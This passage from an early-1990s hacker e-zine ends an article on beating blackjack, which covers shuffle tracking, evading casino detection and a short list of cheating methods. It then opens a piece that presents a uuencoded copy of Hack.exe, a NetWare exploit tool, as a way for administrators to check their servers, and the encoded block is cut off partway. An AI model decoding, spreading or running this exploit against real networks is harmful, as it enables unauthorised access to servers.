of tens in the portion of the deck that will be played. You would accordingly
increase you bet size to maximize your winnings.

   Some dealers will unknowingly split the deck into unequal stacks. However,
more often than not, they are REQUIRED to split the deck into unequal stacks.
If they are required to do this, they are performing the House Shuffle. The
casino has trained the dealer to shuffle a particular way...on purpose! Why?
Because in the long run, the house will benefit from this because most players
will not cut any bad clumps out of play. If you have played BlackJack in a
casino, how much did you pay attention to the way they shuffled? Like most
people you were probably oblivious to it, perhaps you figured that during the
shuffle would be a good time to ask that hot waitress for another drink.
Regardless, you now see that it may be a good idea to pay attention during the
shuffle instead of that set of "big breastseses" as David Allen Grier says on
the "In Living Color" TV show ;)-8-<

   There are a number of shuffle methods, some of which have been labeled as:
the "Zone Shuffle", the "Strip Shuffle", and the "Stutter Shuffle". The Zone
Shuffle is particular to shoe games (multiple deck games) and is probably one
of the most common shuffle methods which is why I mention it here. It is
accomplished by splitting the shoe into 4 to 8 piles depending on the number
of decks in the shoe. Prescribed picks from each pile are made in a very exact
way with intermittent shuffles of each pair of half deck sized stacks. The net
effect is a simple regrouping of the cards pretty much in the same region of
the shoe as they were before, thereby preventing clumps of cards from being
randomly mixed. If the dealer won 40 hands and you won 20, this trend is
likely to continue until you are broke or until the unfavorable bias is
removed through many shuffles.

   What if the players are winning the 40 hands and the dealer only 20? If the
dealer has been mentally keeping track of how many hands each side has won in
the shoe, the dealer will probably do one of two things. One is to keep the
shuffle the same, but 'strip' the deck. When a dealer strips a deck, he/she
strips off one card at a time from the shoe letting them fall on top of one
another onto the table. This action causes the order of the cards to be
reversed. The main consequence is to dissipate any clumping advantages (a bunch
of tens in a clump) that the players may have. The second thing the dealer may
do is simply change the way they shuffle to help randomize the cards.

   I personally believe that casinos use certain shuffles on purpose for the
sole reason that they gain some sort of advantage. A BlackJack dealer friend
of mine disputes the whole theory of card clumping and shuffle tracking
though. The mathematics and simulation prove the non-random nature of certain
shuffles under controlled conditions. Perhaps in an actual casino environment
the effect isn't as high. Regardless, next time you are playing in a casino
and its time to shuffle a shoe, ask the dealer to CHANGE they WAY he/she
shuffles. The answer will nearly always be NO. Try to appeal to the pit boss
and he/she will probably mumble something about casino policy. Why are they
afraid to change the shuffle?

Relevant Reading: [4], [5] Chapters 5 and 6 pages 71 to 98, [14] pages 463
to 466, and [15] which is very detailed and accessible via Internet FTP.


Casino Security and Surveillance:
--------------------------------

   I figured this section might get some people's attention. It is important
to know what the casino is capable of as far as detecting cheating (by
employees and customers) and spotting card counters.

EYE IN THE SKY: A two way mirror in the ceiling of the casino. It's not hard
to spot in older casinos as it usually is very long. Before 1973 or so,
employees traversed catwalks in the ceiling and it was easy for dealers and
players to hear when they were being watched. Sometimes dust from the ceiling
would settle down onto a table when someone was above it. Newer casinos use
those big dark plexiglass bubbles with video camera's which should be watched
constantly. These cameras have awesome Z00M capabilities and according to
Reference [9], the cameras can read the word "liberty" on a penny placed on a
BlackJack table. I am sure the resolution is better than that for the latest
equipment. The video images are also taped for use as evidence should anything
that is suspect be detected. Just like computer security audit logs, if no one
pays attention to them, they don't do much good. If you want a job monitoring
gamblers and casino employees, you need to train for about 500 hours (about
twenty 40 hour weeks) to learn all the tricks people try to pull on you.
Pretty intensive program wouldn't you say?

CASINO EMPLOYEES: Then there are the casino employees. The dealers watch the
players, the floor men watch the dealers and the players, the pitbosses watch
the dealers, the floormen, and the players, etc. There may be plain clothes
detectives roaming about. In a casino, everyone is suspect.

BLACK BOOK: A company that you will see mentioned in a lot of casino books is
Griffin Investigations. They periodically update a book that casino's
subscribe to that have pictures and related info on barred card counters and
known casino cheats.....I suppose the "black book" as it is called, is
analogous to the "Bell security hit-lists", that had (have?) files on known
phreaks and hackers.


Social Engineering the Casino:
------------------------------

   If you are good at getting an ESS operator to enter NET-LINE on DN COE-XXXX,
and at getting those "Engineering Resistant Hard Asses up at SNET (Southern
New England Telephone)" [as The Marauder affectionately calls them] to give
you the new CRSAB number; then this section will be a piece of cake for you
to master.

   References [3], [7], and [8] have many stories regarding playing in
casinos, getting barred, and various exploits. I am not going to repeat any of
them here. In each of those books, the authors talk about their first
experiences getting barred. In each case they were fairly bewildered as to why
they were kicked out, at least until some casino employee or owner told them
things like "you're just too good" and the ever diplomatic: "we know your
kind, get the hell out!".

   As you probably have gathered thus far, card counters are as undesirable in
a casino as a phone phreak is in a central office. There are a number of
behavioral characteristics which have been attributed to the 'typical' card
counter. Probably the most obvious act of a counter is a large increase in bet
size. If you recall in the Card Counting section, when the deck is favorable,
you bet more. When the deck is unfavorable, you bet less. Dr. Thorp's original
system required a variation in bet size from one to ten units. When the deck
is favorable the system may dictate that you go from a ten dollar bet to a
hundred dollar bet. Kind of gets the attention of the dealer and the pit boss.
However, this type of wild wagering is typical of big money hunch bettors.
Hunch betters will just plop down a bunch of chips at random due to 'hunches'.
Therefore, a large increase in bet size won't necessarily cause you to be
pegged as a counter.

   Intense concentration, never taking your eyes off the cards, lack of
emotion...ie, playing like a computer, is pretty much a give away that you are
counting. Other things such as 'acting suspicious', meticulously stacking your
chips, betting in discernable patterns, and a devout abstention from alcohol
may also attract unwanted attention.

   Another criteria used for spotting counters is if there are two or more
people playing in concert with one another. Ken Uston is famous for his
BlackJack teams. They have literally won millions of dollars collectively.
When the "Team-LOD" gets together to play, we have to pretend we don't know
each other so as not to attract undue attention ;-)

   What I mean by Social Engineering the casino is to list ways that trick the
casino into thinking you are just a dumb tourist who is throwing money away.
Look around, smile, act unconcerned about your bet, don't be afraid to talk to
the dealer, floorperson, or pit boss. Don't play 8 hours straight. Perhaps
order a drink. Things of this nature will help deflect suspicion.

   I only recall attracting attention once. The casino wasn't very busy, there
were 3 people at the table including myself. I only had about an hour to play
so I bet aggressively. I started with $5 and $10 but made some $50.00 bets
whenever I got a feeling that I was going to win the next hand (quite the
scientific strategy I know). A woman next to me who seemed to be a fairly
seasoned player made a comment that I was a little too aggressive. The pit boss
hovered about the table. My hour was nearly up, I bet $10.00 for the dealer and
$50.00 for myself. I lost the hand leaving me only $100.00 ahead, and left. The
only thing I could think of besides the betting spread which really wasn't a
big deal was that the casino was FREEZING inside. I was shivering like hell,
it probably looked like I was shaking out of fear of being spotted as a
counter or worse...a cheater.

   So what if a casino thinks you are counter? To be honest, there have
probably been less than 1000 people who have been permanently barred from play
(ie, they have their mugs in the black book). A far greater number have been
asked to leave but were not prevented from returning in the future.

   Tipping the dealer may not necessarily get the casino off your back but
certainly doesn't hurt. When you toke the dealer, place the chip in the corner
of your betting box a few inches from your bet. You may want to say "we are in
this one together" or some such to make sure they are aware of the tip. This
approach is better than just giving them the chip because their 'fate' is tied
in with yours. If your hand wins, 99 out of 100 times they will take the tip
and the tip's winnings off the table.

   The 1 out of 100 that the dealer let the tip+win ride happened to me over
and over again for the better part of a day. It was a week before I had to go
back to college and I was broke, with no money to pay the deposits for rent
and utilities. Basically, if I didn't come up with some money in 7 days, I was
not going back to school. This was 4 years ago BTW. I took out $150 on my
credit card (stupid but hey, I was desperate) and started playing and winning
immediately. I pressed my bets time and time again and in an hour or two had
$500 in front of me (+$350). I started losing a bit so I took a break for a
short while. I went back to a different table with a different dealer. As soon
as I sat down I started winning. I started to tip red chips ($5.00) for the
dealer. The first couple of times he took the $10.00 right away. I kept
winning steadily and continued to toke him. Then he started to let the $10.00
ride! I was amazed because I had never seen that before. That is when I knew I
was HOT. If the dealer is betting on you to win, that says something. When I
stopped playing I cashed in eight black chips. I left with eight one hundred
dollar bills, a net profit of $650.00, just enough to cover everything. Whew!
I probably tipped close to $100.00 that day, and the dealer must have made
double to triple that due to him betting with me. There were a number of times
when the pit boss wasn't close that the dealer would IGNORE my hit or stand
signal. The first time he did this I repeated myself and he did what I asked
but gave me a 'look'. Needless to say, I lost the hand. After that, if he
'thought' I said stand, I didn't argue. This occurred when he had a ten as the
up-card so he knew his total from peeking at the hole card. I am not sure if
this is considered cheating because I did not ask him to do this, nor did we
conspire. It just happened a few times, usually when I had $25-$50 bets on the
line which is when I made sure to throw in a red chip for him.


Casino Cheating and Player Cheating:
------------------------------------

   Cheating by the house is rare in the major casinos ie, those located in
Nevada and Atlantic City. The Nevada Gaming Commission may revoke a casino's
gambling license if a casino is caught cheating players. Granted, there may be
a few employees (dealers, boxmen, whomever) that may cheat players, but it is
extremely doubtful any casino in Nevada or Atlantic City does so on a
casino-wide scale. You definitely should be wary of any casino that is not
regulated such as those found on many cruise ships. Because a casino does not
have to answer to any regulatory agency does not mean it is cheating players.
The fact is that casino's make plenty of money legitimately with the built-in
house advantages and don't really need to cheat players to survive. I provide
some cheating methods here merely to make you aware of the scams. These
techniques are still carried out in crooked underground casinos and private
games.

   The single deck hand-held BlackJack game is quite a bit more susceptible to
cheating by both the dealer and the player than games dealt from a shoe. The
preferred method of dealer cheating is called the "second deal". As you may
infer, this technique requires the card mechanic to pretend to deal the top
card but instead deals the card that is immediately under the top card.
Imagine if you could draw a low card when you need a low card, and a high card
when you need a high card. You could win large sums of money in a very short
period. Well, a dealer who has the ability to execute the demanding sleight of
hand movements for second dealing can drain even the best BlackJack player's
bankroll in short order.

   If someone is going to deal seconds, they must know what the second card is
if he or she is to benefit. One way to determine the second card is by
peeking. A mechanic will distract you by pointing or gesticulating with the
hand that is holding the deck. "Look! There's Gail Thackeray!". While you are
busy looking, the dealer is covertly peeking at the second card. A more risky
method is pegging. A device called a pegger is used to put small indentations
in the cards that the dealer can feel. Pegging all the ten value cards has
obvious benefits.

   Another method is the "high-low pickup". I like this one because it's easy
for a novice to do especially in a place where there are a lot of distractions
for the players. After every hand, the dealer picks up the cards in a high-low
alternating order. The mechanic then proceeds with the "false shuffle" in
which the deck is thought to have been shuffled but in reality the cards
remain in the same order as before the shuffle. As you well know by now, a
high-low-high-low arrangement of the cards would be death to the BlackJack
player. Get dealt a ten and then a 5, you have to hit, so get another ten.
Busted. Since the dealer doesn't lose until he/she busts, all the players who
bust before lose. Bottom dealing and switching hole cards are other techniques
that may be used to cheat players.

   For shoe games, there is a device called a "holdout shoe" that essentially
second deals for the dealer. Discreet mirrors and prisms may be contained in
the holdout shoe which only allow the dealer to see what card is next.
Shorting a regular shoe of ten cards will obviously have a detrimental effect
on the BlackJack player.

   Player cheating isn't recommended. However, I'll quickly list some of the
methods for awareness purposes. The old stand-by of going up to a table,
grabbing some chips, and running like hell is still done but certainly lacks
originality. Marking cards while you play is another popular method. "The
Daub" technique is done by clandestinely applying a substance that leaves an
almost invisible smudge on the card. High value cards like tens are usually
the targets. One scam mentioned in one of the references was the use of a
special paint that was only visible to specially made contact lenses. The
"hold out" method requires the palming of a card and substituting a better
one. This is usually done when there is big money bet on the hand. One of the
risks to these methods is when the deck is changed since the pit boss always
scrutinizes the decks after they are taken out of play.

   Other methods entail playing two hands and switching cards from one hand to
the other, counterfeiting cards and/or casino chips, adding chips after a
winning hand (I have seen this done twice, couldn't believe my eyes but
certainly wasn't going to RAT the thieves out). Some dealers may be careless
when looking at their hole card for a BlackJack. A person behind the dealer on
the other side of the pit may be able to discern the card. The value is then
signalled to a player at the table. Astute pit bosses may notice someone who
is not playing that scratches their head too much though. Wireless signalling
devices have been used for various purposes but some casinos have new
electronic detection systems that monitor certain frequencies for activity.


Some Comments Regarding Computer BlackJack Software for PC's:
---------------------------------------------------------------

   I strongly recommend that you practice using a BlackJack program of some
kind before going out to play with real cash. The first program I used for
'training' some years ago was "Ken Uston's BlackJack" on my old Apple ][+.
Later I acquired "Beat The House" for the same machine. I recently bought a
program for my IBM and have been using it to refresh my memory regarding basic
strategy, card counting, and money management techniques. I assume you will
recognize the guy's name in the title now that you have read most of this
article. I bought: "Dr. Thorp's Mini BlackJack" by Villa Crespo Software at a
Wal-Mart of all places for a measly $7.88. This is an abridged version
however. Villa Crespo charges $12.95 for it if you order via mail. They also
offer an unabridged version for $29.95 via mail. Villa Crespo (don't ask me
where they got that name) offers other programs for Craps, Video Poker, and
7-Card Stud in case you are interested in those games of chance. By the way,
on the order form I also noticed "FAILSAFE Computer Guardian (Complete
protection and security for your system)" for $59.95. For some reason any time
a piece of paper has the word 'security' on it, my eyes zero in on it....

   Some features that I liked about this scaled down version of their
BlackJack program were the TUTOR, which advises you on whether to hit, stand,
take insurance (no way), etc. as per Basic Strategy. The Tutor for the
abridged version does NOT take into consideration the card count when making
recommendations though. If you are counting the cards, the program keeps count
also, so if you lose count you can check it by pressing a function key. The
STATS option is neat since it keeps track of things such as how many hands
were dealt, how many you won/lost, etc. and can be printed out so you can
track your progress. The program allows you to save your current session in
case you get the urge to dial up the Internet to check your email, something
that should be done every hour on the hour....

   One thing I did not like about the program was that it allowed you to bet
over your bankroll. I accidentally pushed [F2] (standardized at $500.00 a
bet instead of [F1] (standardized at $5.00 a bet) ---- a slight difference in
wager I'd say. Having only $272.00 in my bankroll didn't stop the program from
executing the command and in my opinion it should have prevented the overdraft.

   The first time I played Dr. Thorp's Mini BlackJack, it took me about 95
hands to double my money. I started with $200.00, bet from $5.00 to $25.00,
never dropped below $180.00 which surprised me, and received 3 BlackJacks. I
won 63 hands, and lost 32. I played head on against the dealer, although the
program allows for up to 6 players. I consider that lucky since I had my fair
share of going broke in later sessions.

   My advice when using a BlackJack computer program is: do not start with a
bizzillion dollars or anything like that. Start with the amount that you truly
plan to use when you sit down at an actual table. If you play in a crowded
casino, all the low minimum bet tables (ie: $1.00 to $5.00) will most likely be
filled to capacity and only $10.00 or $15.00 tables will have openings. Keep
this in mind because when you make bets with the computer program, you should
wager no less than whatever the minimum will be at the table you sit down at.
If your bankroll is only $200.00 playing at anything more than a $5.00 minimum
table is pushing it.

   Another thing to note is that playing at home is kind of like watching
Jeopardy on TV while you are sitting on the couch. People who have been on the
show always say it was much harder than when they blurted out answers during
dinner with their mouths full (the Heimlich maneuver--a real lifesaver!). The
same thing goes for BlackJack. When you are sitting at an actual table, your
adrenaline is flowing, your heart starts to pump faster, you make irrational
plays especially when you start losing, and odds are you will forget things
that were memorized perfectly. There is no substitute for the real thing and
real experience.


Quick Comments on Other Casino Games:
-------------------------------------

   A few people suggested I briefly mention some of the other casino games so
I added this section. I don't go into much detail at all as this file is too
unwieldy already. Besides, if you want to know more, I am sure you'll pick up
the appropriate reference. Hundreds of books have been published on gambling
and they are available by contacting [2]. My aim here was to mention details
that most people may not be aware of.

BACCARAT: This is the game you see in movies a lot. See [12]'s FAQ for a good
explanation of this game.

CRAPS: Craps is probably the most complicated casino game as far as the
different ways to bet things are concerned but its really not that hard to
learn. I just want to throw one table at you adapted from Reference [13]. The
table won't make much sense unless you are already familiar with craps. In
case you have forgotten or didn't know, craps is 'that dice game'. The purpose
of presenting it is to save you $$$$$ <-- Still love that dollar sign key! hehe

                         Lamest Bets at the Craps Table

                BET            PAYS     SHOULD PAY   YOUR ADVANTAGE
              -------------------------------------------------------
              Any-7            4  to 1     5 to 1         -16.7 %
              2 (or 12)        30 to 1    35 to 1         -13.9 %
              Hard 10 (or 4)   7  to 1     8 to 1         -11.1 %
              3 (or 11)        15 to 1    17 to 1         -11.1 %
              Any Craps        37 to 1     8 to 1         -11.1 %
              Hard 6 (or 8)    9  to 1    10 to 1         -9.1  %

SLOTS: Playing slots is a gamble. Obviously you say. No, I mean its a gamble
to play them. House advantages are almost never displayed on a particular slot
machine. Different machines and different locations may have different casino
win percentages. When you go up to a slot machine, you have no idea if its'
advantage over you is 5% or 25%. Unless you have been watching it, you don't
know if it just paid off a big jackpot either. I don't play slots as a matter
of principle. If you do play I think there are still some $.05 slots in Vegas.
Play the nickel slots and keep your shirt, especially if its an LOD T-shirt.

VIDEO POKER: Reference [13] gives the following advice regarding video poker:
"...don't expect to win. Manage your money so that you limit your losses." I
think its a bit negative but I can't argue with the logic. Also, as with
slots, you may want to play at a machine that is networked with others which
has a progressive payoff. This way at least you have a chance of making the
big bucks in addition to those periodic small payoffs.

VIDEO BLACKJACK: If you like to avoid people and like BlackJack, you may be
thinking that this is a great way for you to "hack two systems with one
password" and make a little money on the side. Before you start putting
quarter or dollar tokens into video BlackJack machines there are a couple of
things to know. First, you can't use card counting techniques because
every hand is essentially dealt from a new deck. When the computer deals a
hand it is just providing 'random' cards. Perhaps if you saw the source code,
you may be able to determine some sort of bias but I suspect it would be
minuscule at best. The rules vary from machine to machine and the maximum
allowable bet varies also. As with the video poker and video slot machines,
the owner of the machine may set the options to their taste (amount of profit).


Selected Bibliography:
----------------------

The following are some references you may want to check out and some of my
sources of information for this article. They are not in any particular order
and the format is far from standard as opposed to my thesis bibliography :)

[1] "BlackJack Forum Newsletter" by RGE Publishing in Oakland California. This
is a quarterly publication which has the location and rule variations info
(among other things) for casinos in the state of Nevada.

[2] The Gamblers Book Club (its really a store) can sell you a sample of the
BlackJack Forum Newsletter for $10.00. They have all kinds of new and out of
print books, used magazines, etc. They are located in Vegas (630 S. 11th St.)
so stop by in person or call 1-800-634-6243 which was valid as of 6/1/93 since
I just gave them a ring...the guy I spoke to was very nice and helpful so I
thought I'd give them a plug here.

[3] "Beat The Dealer" by Dr. Edward O. Thorp. Make sure you get the SECOND
edition (1966) since it has Dr. Julian Braun's additions to the original 1962
edition.

[4] "Gambling Times Magazine" (now defunct), 'BlackJack Bias Part 1 and 2' July
and August 1987 Issues by Mason Malmuth. This magazine was great because it
kept you up to date on the latest in gambling systems and what casinos are up
to. The article is about the author using his PC to perform simulations
regarding the effects of non-random card distribution on BlackJack.

[5] "Break The Dealer" by Jerry L. Patterson and Eddie Olsen, 1986 Perigee
Books. Worth the money for the chapters on Shuffle Tracking alone.

[6] "The Optimum Strategy in BlackJack" by Roger R. Baldwin, Wilbert E.
Cantey, Herbert Maisel, James P. McDermott. Journal of the American
Statistical Association, September 1956. Eight of ten pages are mathematics.

[7] "The World's Greatest BlackJack Book" revised edition (1987) by Dr. Lance
Humble and Dr. Carl Cooper, Doubleday. I am not sure it is THE world's
greatest, but it is an excellent book. It is 400 pages and provides more
details than you probably care to know about the Hi-Opt I counting system.

[8] "Turning the Tables on Las Vegas" by Ian Anderson, 1978. This is an
excellent book if you were interested in The Social Engineering the Casino
section. The author shares a lot of interesting and funny stories that can
keep you from getting barred. Note that 'Ian Anderson' is the authors' handle.

[9] "Las Vegas, Behind the Tables" by Barney Vinson, 1986, Gollehon Press.
Written by a casino executive, I found it to be quite illuminating.

[10] "Gambling Scams" by Darwin Ortiz, 1990, Carrol Publishing. If you play in
any private games, be sure to read this one to avoid getting screwed. It even
has a section on crooked carnival games.

[11] "Winning Without Counting" by Stanford Wong. This book has an interesting
section on 'Dealer Tells' and how to exploit them.

[12] "Rec.Gambling" Internet USENET Newsgroup. The rec.gambling newsgroup is
an excellent free source of current information on BlackJack and other games.
People who have just gotten back from various casinos post about their playing
results and the treatment from casinos. One person just posted that he was
barred from playing BlackJack (a casino employee told him he could play any
game in the casino EXCEPT BlackJack) after he was ahead only $40.00. The
reason apparently was due to his fairly mechanical play and betting. The
rec.gambling FAQ was message #15912 when I read the newsgroup on 6/8/93. They
plan on posting the FAQ every month or so. I found the FAQ to be very
informative. There is an alt.gambling newsgroup but it is dead with 0
messages.

[13] "The Winner's Guide to Casino Gambling", revised edition by Edwin
Silberstang, 1989 Plume printing. This book covers a wide range of casino
games and has a large list of gambling terms in the back.

[14] "Gambling and Society" edited by William R. Eadington, 1976. This book
provides plenty of information on the psychology of gambling. I found the
section on 'Who Wants to be a Professional Gambler?' interesting as the study
indicates the types of vocations that show high correlations with being a
professional gambler. One of those vocations with an 'extremely high
correlation' was being a Secret Service agent. Maybe Agent Foley will change
jobs.....he can't do much worse, ahem. Chapter 24 by James N. Hanson is
entitled "Nonlinear Programming Simulation and Gambling Theory Applied to
BlackJack" which some of you programmers might be interested in.

[15] "The BlackJack Shuffle-Tracking Treatise" by Michael R. Hall accessible
via the Internet by anonymous FTP: soda.berkeley.edu in the
pub/rec.gambling/blackjack directory. This is a very detailed 78K file that
was well done. It provides plenty of the nitty-gritty details that I did not
have the space to mention in this article. I highly recommend it.

[16] "Risk of Ruin" by Michael R. Hall available from same source as [15]
above. This paper provides some mathematical formulas for helping you
determine the likelihood of losing portions of your starting bankroll.
Although the equations look complicated, anyone with a $10. scientific
calculator can use them. The author provides source code for a program written
in C that calculates the risk formula. Also get his "Optimal Wagering" file
which helps you determine your bet size.

[17] The movie: "Fever Pitch" starring Ryan 'O Niel. This is the most realistic
movie I have seen regarding the psychology of a gambler. If I recall correctly,
it was made in 1985 and is in most video rental stores.


Final Comments:
---------------

   Let me quickly thank those who took the hour to read my article, recommended
corrections and offered their insightful comments: The Marauder, Mark Tabas,
Professor Falken, Al Capone, Jester Sluggo, and Bruce Sterling. Also, I would
like to thank JLE, my 'gambling mentor' mentioned earlier even though he
doesn't know me as 'lex' and probably will never see this file.

   If anyone has comments, corrections, etc. feel free to email me. Kindly
note that I have no interest in receiving flames from any self professed
BlackJack experts out there as I do not claim to be an expert and due to size
restrictions, I couldn't get all that complicated regarding counting
techniques and such. Besides, anyone who wants to get serious will take the
time to thoroughly read the references listed in the previous section. My main
purpose was to familiarize you with the game of BlackJack and provide a
resource which can point you in the right direction for more in-depth
information. Thank you for your time and I hope you learned something from
this article even if you don't put any of the information to use.

   If you have something really SEKRET to tell me, here is my PGP Public Key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2

mQCNAiwEHN4AAAEEAMtDxWI2HYsAQO8QhDBYhHvmn3fzGpKFbimxl34XiQ5woU/K
lqbD53ahfnB9ST22yxEvexXW0VGVVfSp9xiUl7d7RsTm7Uas3OaOOiSFIRCVvcG8
FnWARH0nmELBXYkXXjjvjm2BiCEkn45eFaZPX7KbCuIGVjCe3zltpJGBK2OvAAUR
tCRMZXggTHV0aG9yIDxsZXhAbWluZHZveC5waGFudG9tLmNvbT4=
=LOXY
-----END PGP PUBLIC KEY BLOCK-----


                 End of "How To Hack BlackJack": File 2 of 2

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 11 of 27

                     Help for Verifying Novell Security
                                 Provided By
                               Phrack Magazine

In nearly a year since their release, the programs Hack.exe and View.exe
are still potential threats to the security of Novell Networks.  Despite
Novell's commendable response with a patch for the holes these programs
exposed, many system administrators have not yet implemented the fix.

We at Phrack encourage system administrators to uudecode and execute the
following programs to determine whether or not their servers are at
risk.

The patches, SECUREFX.NLM for Netware 3.11, and SECUREFX.VAP for Netware
2.2 are available via Novell's NetWire, or from ftp.novell.com.  Users
with additional questions about Netware security can call Novell
directly at 800-638-9273.

------------------------------------------------------------------------

begin 777 hack.exe
M35HA 2L 6 %@ )H __\,!0 (%10Z *@ '@    $ ) #B!"( X@0@ .($'@#B
M!!P X@0: .($& #B!!8 X@04 .($$@#B!!  X@0. .($# #B! H X@0( .($
M!@#B! 0 X@0" .($  #B!"D"   . @  ^ $  .P!  #C 0  S0$  +<!  "K
M 0  HP$  )L!  "3 0  A0$  &<!  !@ 0  &@$  !,!   & 0  \0   ,( 
M  "[    JP   )X   "(    <@   %H    [    -    "P    D    '   
M  \    )    =@0  &H$  !B!   6@0  #P$   U!   ' 0  !4$   -!   
M! 0  /@#  #O P  WP,  -8#  ## P  NP,  *X#  "8 P  @@,  &$#  !4
M P  /@,  !T#   0 P  ^@(  .H"  #B @  V@(  -$"  #* @  J@(  *,"
M  "; @  A (  'T"   Y @  ,@(  -@&  "R!@  JP8  (8&  !_!@  <08 
M %8&  !*!@  008  "0&   =!@  # 8   0&  #\!0  ] 4  .P%  #D!0  
MS@4  +@%  "7!0  B@4  '0%  !M!0  904  %T%  !4!0  /@4   D%  #\
M!   Y@0  +$$  "D!   C@0  (<$  #E"   V @  ,((  "["   > @  &@(
M  !@"   6 @  $\(   T"   '@@  !((   )"   \P<  -T'  #$!P  O0< 
M *,'  "7!P  CP<  (<'  !_!P  10<  !X'   (!P   0<  / &  #H!@  
MWP8  'P*  !E"@  7@H  "@*   5"@  !@H  /()  #K"0  UPD  +()  "@
M"0  B@D  '0)   ^"0  ,0D  !L)   / ( "-@"  L@ C0*K (T"G0"- G@ 
MC0)5 (T".P"- BH C0(9 (T""P&= NL G0+" )T"G0"= H4 G0)D )T"20"=
M C$ G0(@ )T"? "P E0 L (L + "B@.X DD"N +K ;@"Q &X JL!N *3 ;@"
M#0&X O@ N +> +@"6P"X D8 N (L +@"0P>X C4'N (=![@""P>X NT&N +-
M!K@"H :X H0&N )Y!K@"4@:X CP&N (,!K@" 0:X NH%N +1!;@"O 6X HP%
MN *!!;@":@6X E$%N (\!;@"O 2X MP*N (T"K@"K@FX H4)N )L";@"00FX
M A@)N (*";@"VPBX LT(N *U"+@"HPBX H((N )I"+@"/@BX @\(N (!"+@"
MZ0>X M<'N *V![@"G0>X G('N (/ &D#*0!M X( = -K '0#5 !T S8 = ,<
M 'P#90!^ T\ ?@,Y 'X#(P!^ P\ ?@.P (0#D0"$ W  A -3 (0#-@"$ W4 
MD@-@ )(#/0"2 R, D@,2 )(#_@": ]0 F@.? )H#E ": W$ F@-0 )H#/P":
M RT F@,< )H#9@;S T4 J !E *@ ;0"H +4 J "\ *@ P0"H -P J #B *@ 
MY0"H /< J #\ *@ _@;S _L!J !T J@ B *H ,X"J #7 J@ -P6H !$&J " 
M!J@ ;@:H %(&J  . .$$-@WS S -\P.8#O,#,0BH  P(J #K!Z@ 9P>H %H'
MJ !/!Z@ . >H "X'J  @!Z@ =@BH &8*J !4"J@ 1PJH #<*J #_":@ S0FH
M +H)J "I":@ $@FH  8)J #W"*@ ZPBH ,H*J  '"Z@ GP^H (H/J  F .($
M>!.H .$2J !U$J@ -Q*H "X6J #1%Z@ _1>H +49J #&#O,#R@[S \X.\P/2
M#O,#U@[S ]$;J                                               
M                                                            
M                                                            
M        58OLN @ FI0"J !6F@0 9P,*P'0#Z5P*N'8#NJ\#4E"X' "ZKP-2
M4+@& +JO U)0N$(#NJ\#4E":!P"  H/$$ O =0/I)PJ.!C /)J!" RKD4+A"
M !Y0FC(&J "#Q :.!C(/)J & "KD4+A: !Y0FC(&J "#Q :.!C0/)O\V' "X
M<@ >4)HR!J@ @\0&C@8V#R;_-G8#N(H 'E":,@:H (/$!KBB !Y0FC(&J "#
MQ 2X, !0*\!0N$8#NJ\#4E":B!NH (/$"(X&. \FQ@9. _@FQ@9/ _@FQP90
M T #)L<&: ," ";'!FH#I@(FQP9L Z\#)L<&;@,E ";'!G #6  FQP9R Z\#
MN"8 4"O 4+BF KJO U)0FH@;J "#Q B.!CH/)L<&I@+__R;&!JL"$2;&!K8"
M!";&!K<"42;&!L("0";&!L," R;'!L0"(B(FQ@;* A>X!@%0*\!0N%@ NJ\#
M4E":B!NH (/$"(X&/ \FQ@9: $$FQ@9;   FQ@9<  &:"@!\ XX&/@\FHT0#
MN&@"NJ\#4E"X7@&ZKP-24+CB ;JO U)0N"  NJ\#4E F_S9$ YH, (0#@\02
MC@9 #R:C<@)0N*0 'E":,@:H (/$!HX&/@\F_S9$ [B\ !Y0FC(&J "#Q :X
M( "ZKP-24+C4 !Y0FC(&J "#Q B.!D(/)O\VX@&X[  >4)HR!J@ @\0&C@9$
M#R;_-F !)O\V7@&X! $>4)HR!J@ @\0(N"  NJ\#4E":ZAJH (/$! 5  (X&
M. \FHW0#!28 B4;^C@8Z#XI&_RKDBF[^*LD#P2:CJ *#;OX"C@8\#XI&_RKD
MBF[^ \$FHU@ N"  NJ\#4E":ZAJH (/$!(A&^HX&/ \FHET *N10N"  NJ\#
M4E"X7@"ZKP-24)H"&Z@ @\0*BD;Z*N2+\(X&/ \FQH1>  ^X' $>4(V$7P"Z
MKP-24)J*&J@ @\0(N @ NJ\#4E"X4 "ZKP-24+@" +JO U)0C@8^#R;_-D0#
MF@P = .#Q Z.!D /)J-R E"X+ $>4)HR!J@ @\0&N$0!'E":,@:H (/$!,=&
M_   BU[\C@9&#R:*AP( *N10N%D!'E":,@:H (/$!O]&_(-^_ 1\V[A> 1Y0
MFC(&J "#Q 2X8 $>4)HR!J@ @\0$QT;\  "+7OR.!D@/)HJ'4  JY%"X=0$>
M4)HR!J@ @\0&_T;\@W[\!GS;N'H!'E":,@:H (/$!(X&2@\F_S8( +A\ 1Y0
MFC(&J "#Q :XE $>4)HR!J@ @\0$FE8 ?@..!DP/)J-P E"XE@$>4)HR!J@ 
M@\0&N'0"NJ\#4E".!DP/)O\V< *:"P") H/$!KAT KJO U)0N*X!'E":,@:H
M (/$"+AT KJO U)0N"  NJ\#4E":BAJH (/$"(X&0@\FQP;B 00 N,8!'E"X
M# "ZKP-24)J*&J@ @\0(C@9.#R;'!J0" 0".!E /)L8&    N H NJ\#4E"X
M  "ZKP-24+AX [JO U)0N $ 4+@, +JO U)0C@9"#R;_-N(!N"  NJ\#4E":
M#@"= H/$&(X&0 \FHW("4+C2 1Y0FC(&J "#Q :XZ@$>4)HR!J@ @\0$QT;\
M  "+7OR.!E(/)HJ'> ..!CH/)HB'K *+7OR.!E(/)HJ'> .84+C_ 1Y0FC(&
MJ "#Q ;_1OR#?OP$?,>X! (>4)HR!J@ @\0$N 8"'E":,@:H (/$!,=&_ 0 
MBU[\C@92#R:*AW@#C@8Z#R:(AZP"BU[\C@92#R:*AW@#F%"X&P(>4)HR!J@ 
M@\0&_T;\@W[\"GS'N" "'E":,@:H (/$!+CF ;JO U)0N&(#NJ\#4E"X> .Z
MKP-24)H" &T#@\0,C@9 #R:C<@)0N"("'E":,@:H (/$!K@Z AY0FC(&J "#
MQ 3'1OP  (M>_(X&. \FBH=B RKD4+A/ AY0FC(&J "#Q ;_1OR#?OP&?-NX
M5 (>4)HR!J@ @\0$QT;X  #'1OP  .F# ;CE ;JO U)0N!X NJ\#4E"XY &Z
MKP-24+CB ;JO U)0N"  NJ\#4E"X7@&ZKP-24(X&5 \F_S96 +C, KJO U)0
